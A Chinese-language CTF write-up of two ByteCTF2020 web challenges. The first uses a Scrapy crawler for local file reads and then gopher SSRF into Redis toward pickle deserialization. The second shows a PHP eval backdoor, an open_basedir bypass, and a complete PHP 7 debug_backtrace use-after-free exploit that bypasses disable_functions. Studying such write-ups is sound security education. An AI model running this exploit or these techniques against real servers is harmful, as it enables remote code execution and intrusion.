# ByteCTF2020 ## easy_scrapy 用学长写的docker复现:https://github.com/baiyecha404/CTFWEBchallenge/tree/master/bytectf2020/easyscrapy mogondb初始化可能有点问题,手动调一下就好了 没有web界面,自己写脚本push 原题是: 过验证码提交:只允许http/https,url存入redis,bot会去爬取,有回显 url提交:`result?url=` 可以其他协议,都会发请求,不会存入redis,无回显 复现时本地用py脚本push ![image-20201028112617691](https://gitee.com/leonsec/images/raw/master/image-20201028112617691.png) 尝试push一条url,可以发现爬虫成功爬取,并删掉redis中的缓存 ![image-20201028113212929](https://gitee.com/leonsec/images/raw/master/image-20201028113212929.png) 尝试任意文件读: ```python import redis redis_Host = "127.0.0.1" redis_key = 'byte:start_urls' rediscli = redis.Redis(host = redis_Host, port = 6379, db = "0") rediscli.lpush(redis_key, "http://ip/leon") ``` ![image-20201028114630910](https://gitee.com/leonsec/images/raw/master/image-20201028114630910.png) ![image-20201028114616974](https://gitee.com/leonsec/images/raw/master/image-20201028114616974.png) ![image-20201028120854672](https://gitee.com/leonsec/images/raw/master/image-20201028120854672.png) 由上图,可以发现scrapy不止爬取了leon页面,还会顺着href属性去爬取 原题经过bot爬取的页面内容,会回显,但是只支持http和https协议,所以我们可以构造`<a href="file:///etc/passwd"></a>` 尝试读本地文件: ![image-20201028120748522](https://gitee.com/leonsec/images/raw/master/image-20201028120748522.png) 可以成功读取 走流程: ![image-20201028131429527](https://gitee.com/leonsec/images/raw/master/image-20201028131429527.png) ![image-20201028131011802](https://gitee.com/leonsec/images/raw/master/image-20201028131011802.png) 得知`/code`目录,接下来想办法读bot的文件 去翻scrapy的官方文档,找到example:https://docs.scrapy.org/en/latest/intro/examples.html 官方给了个项目:https://github.com/scrapy/quotesbot 在这里看到了scrapy爬虫的大概框架: ![image-20201028132144501](https://gitee.com/leonsec/images/raw/master/image-20201028132144501.png) 在scrapy.cfg文件中可以读到项目名称,很大可能是文件夹名称 ![image-20201028132208229](https://gitee.com/leonsec/images/raw/master/image-20201028132208229.png) 于是读到了所有文件,在settings.py看到了redis内网ip,在pipelines.py看到了mongodb配置信息 有redis很容易想到ssrf打redis,在`result?url=`尝试时得知为pycurl,pycurl支持gopher协议,所以可以在此处打ssrf ![image-20201028141728411](https://gitee.com/leonsec/images/raw/master/image-20201028141728411.png) 打redis基本流程走一遍,定时任务、主从复制、写公钥,没用,想到python后端,还有redis,他们之间传数据,按照经验一般是传输pickle序列化数据,所以有可能存在pickle反序列化,写个循环push,看看redis会不会出现序列化数据,如果有方向就明确了 ```python import redis redis_Host = "127.0.0.1" redis_key = 'byte:start_urls' for i in range(1,200): rediscli = redis.Redis(host = redis_Host, port = 6379, db = "0") rediscli.lpush(redis_key, "http://www.baidu.com") ``` 这里要多查看几次,可以看到会出现`"byte:requests"`且类型为`zset`,我使用`lrange`查看会报`WRONGTYPE Operation against a key holding the wrong kind of value`,查了一下,https://www.cnblogs.com/jeffen/p/6091385.html,要使用`zadd`,`zrange` ![image-20201028142759941](https://gitee.com/leonsec/images/raw/master/image-20201028142759941.png) 尝试了多次,终于看到了序列化数据: ![image-20201028143931808](https://gitee.com/leonsec/images/raw/master/image-20201028143931808.png) 既然redis存了序列化数据,那么肯定存在反序列化,[HuaShuiTeam的WP](https://www.anquanke.com/post/id/220810)可以看到确实源码中有明显的序列化与反序列化 所以只需要构造gopher打redis,向`"byte:requests"`插入我们构造的payload即可 注意: 类型为`zset`,使用`zadd`添加数据 原题是get传参,gopher注意二次编码 根据之前本地看到的序列化数据,是protocol协议为2.0的pickle,并且是\x形式的16进制 ## Wallbreaker 2020 两行代码日全球 ```php <?php if(!$_REQUEST["backdoor"]) highlight_file(__FILE__); else eval($_REQUEST["backdoor"]); ``` 先看phpinfo ![image-20201029001917314](https://gitee.com/leonsec/images/raw/master/image-20201029001917314.png) disable_functions: ``` pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,iconv,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,dl,mail,error_log,ini_set,debug_backtrace,gc_collect_cycles ``` open_basedir: ``` /var/www/html/:/tmp/ ``` 比赛时,通用exp绕过open_basedir列目录: ```php ?backdoor= $file_list = array(); $it = new DirectoryIterator("glob:///*"); foreach($it as $f) { $file_list[] = $f->__toString(); } sort($file_list); foreach($file_list as $f){ echo "{$f}<br/>"; } ``` 得到: ![](https://gitee.com/leonsec/images/raw/master/Rw9IPoRBGEjKlsfA.png) 由于`ini_set`,`symlink`被ban了,没法使用常用的bypass open_basedir读文件 其他bypass disable_functions的方法也不满足,没有ban`putenv()`,ban了`mail()` `error_log() ` `imap_open()`所以总感觉方向还是ld_preload,比赛时着力研究在没有其他扩展的情况下,找到能调用新进程的函数,通过ld_preload进行bypass 但是 全部fuzz一遍后,并没有找到 尝试了其他bypass方式,如 [JSON UAF Bypass](https://github.com/mm0r1/exploits/tree/master/php-json-bypass) [GC Bypass](https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass) [Backtrace Bypass](https://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass) [l3mon/Bypass_Disable_functions_Shell](https://github.com/l3m0n/Bypass_Disable_functions_Shell) 都没用 赛后看到cnss打了个非预期,一看到利用方式,我就想起来,除了disable_functions,他们还ban了disable_classes disable_classes: ``` Exception,SplDoublyLinkedList ``` 然鹅[Exception](https://www.php.net/manual/zh/language.exceptions.php)类可以用[Error](https://www.php.net/manual/zh/language.errors.basics.php)类绕过,所以[Backtrace Bypass](https://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass)可以用,改一下即可: exp: ```php <?php # PHP 7.0-7.4 disable_functions bypass PoC (*nix only) # # Bug: https://bugs.php.net/bug.php?id=76047 # debug_backtrace() returns a reference to a variable # that has been destroyed, causing a UAF vulnerability. # # This exploit should work on all PHP 7.0-7.4 versions # released as of 30/01/2020. # # Author: https://github.com/mm0r1 pwn("uname -a"); function pwn($cmd) { global $abc, $helper, $backtrace; class Vuln { public $a; public function __destruct() { global $backtrace; unset($this->a); $backtrace = (new Error)->getTrace(); # ;) if(!isset($backtrace[1]['args'])) { # PHP >= 7.4 $backtrace = debug_backtrace(); } } } class Helper { public $a, $b, $c, $d; } function str2ptr(&$str, $p = 0, $s = 8) { $address = 0; for($j = $s-1; $j >= 0; $j--) { $address <<= 8; $address |= ord($str[$p+$j]); } return $address; } function ptr2str($ptr, $m = 8) { $out = ""; for ($i=0; $i < $m; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } function write(&$str, $p, $v, $n = 8) { $i = 0; for($i = 0; $i < $n; $i++) { $str[$p + $i] = chr($v & 0xff); $v >>= 8; } } function leak($addr, $p = 0, $s = 8) { global $abc, $helper; write($abc, 0x68, $addr + $p - 0x10); $leak = strlen($helper->a); if($s != 8) { $leak %= 2 << ($s * 8) - 1; } return $leak; } function parse_elf($base) { $e_type = leak($base, 0x10, 2); $e_phoff = leak($base, 0x20); $e_phentsize = leak($base, 0x36, 2); $e_phnum = leak($base, 0x38, 2); for($i = 0; $i < $e_phnum; $i++) { $header = $base + $e_phoff + $i * $e_phentsize; $p_type = leak($header, 0, 4); $p_flags = leak($header, 4, 4); $p_vaddr = leak($header, 0x10); $p_memsz = leak($header, 0x28); if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write # handle pie $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr; $data_size = $p_memsz; } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec $text_size = $p_memsz; } } if(!$data_addr || !$text_size || !$data_size) return false; return [$data_addr, $text_size, $data_size]; } function get_basic_funcs($base, $elf) { list($data_addr, $text_size, $data_size) = $elf; for($i = 0; $i < $data_size / 8; $i++) { $leak = leak($data_addr, $i * 8); if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = leak($leak); # 'constant' constant check if($deref != 0x746e6174736e6f63) continue; } else continue; $leak = leak($data_addr, ($i + 4) * 8); if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = leak($leak); # 'bin2hex' constant check if($deref != 0x786568326e6962) continue; } else continue; return $data_addr + $i * 8; } } function get_binary_base($binary_leak) { $base = 0; $start = $binary_leak & 0xfffffffffffff000; for($i = 0; $i < 0x1000; $i++) { $addr = $start - 0x1000 * $i; $leak = leak($addr, 0, 7); if($leak == 0x10102464c457f) { # ELF header return $addr; } } } function get_system($basic_funcs) { $addr = $basic_funcs; do { $f_entry = leak($addr); $f_name = leak($f_entry, 0, 6); if($f_name == 0x6d6574737973) { # system return leak($addr + 8); } $addr += 0x20; } while($f_entry != 0); return false; } function trigger_uaf($arg) { # str_shuffle prevents opcache string interning $arg = str_shuffle(str_repeat('A', 79)); $vuln = new Vuln(); $vuln->a = $arg; } if(stristr(PHP_OS, 'WIN')) { die('This PoC is for *nix systems only.'); } $n_alloc = 10; # increase this value if UAF fails $contiguous = []; for($i = 0; $i < $n_alloc; $i++) $contiguous[] = str_shuffle(str_repeat('A', 79)); trigger_uaf('x'); $abc = $backtrace[1]['args'][0]; $helper = new Helper; $helper->b = function ($x) { }; if(strlen($abc) == 79 || strlen($abc) == 0) { die("UAF failed"); } # leaks $closure_handlers = str2ptr($abc, 0); $php_heap = str2ptr($abc, 0x58); $abc_addr = $php_heap - 0xc8; # fake value write($abc, 0x60, 2); write($abc, 0x70, 6); # fake reference write($abc, 0x10, $abc_addr + 0x60); write($abc, 0x18, 0xa); $closure_obj = str2ptr($abc, 0x20); $binary_leak = leak($closure_handlers, 8); if(!($base = get_binary_base($binary_leak))) { die("Couldn't determine binary base address"); } if(!($elf = parse_elf($base))) { die("Couldn't parse ELF header"); } if(!($basic_funcs = get_basic_funcs($base, $elf))) { die("Couldn't get basic_functions address"); } if(!($zif_system = get_system($basic_funcs))) { die("Couldn't get zif_system address"); } # fake closure object $fake_obj_offset = 0xd0; for($i = 0; $i < 0x110; $i += 8) { write($abc, $fake_obj_offset + $i, leak($closure_obj, $i)); } # pwn write($abc, 0x20, $abc_addr + $fake_obj_offset); write($abc, 0xd0 + 0x38, 1, 4); # internal func type write($abc, 0xd0 + 0x68, $zif_system); # internal func handler ($helper->b)($cmd); exit(); } ``` 传到`/tmp` 访问:http://123.57.91.179:30085/?backdoor=include(%27/tmp/1.php%27); ![image-20201029005154109](https://gitee.com/leonsec/images/raw/master/image-20201029005154109.png) 成功绕过。。。 ![image-20201029005237385](https://gitee.com/leonsec/images/raw/master/image-20201029005237385.png) ![image-20201029005304301](https://gitee.com/leonsec/images/raw/master/image-20201029005304301.png)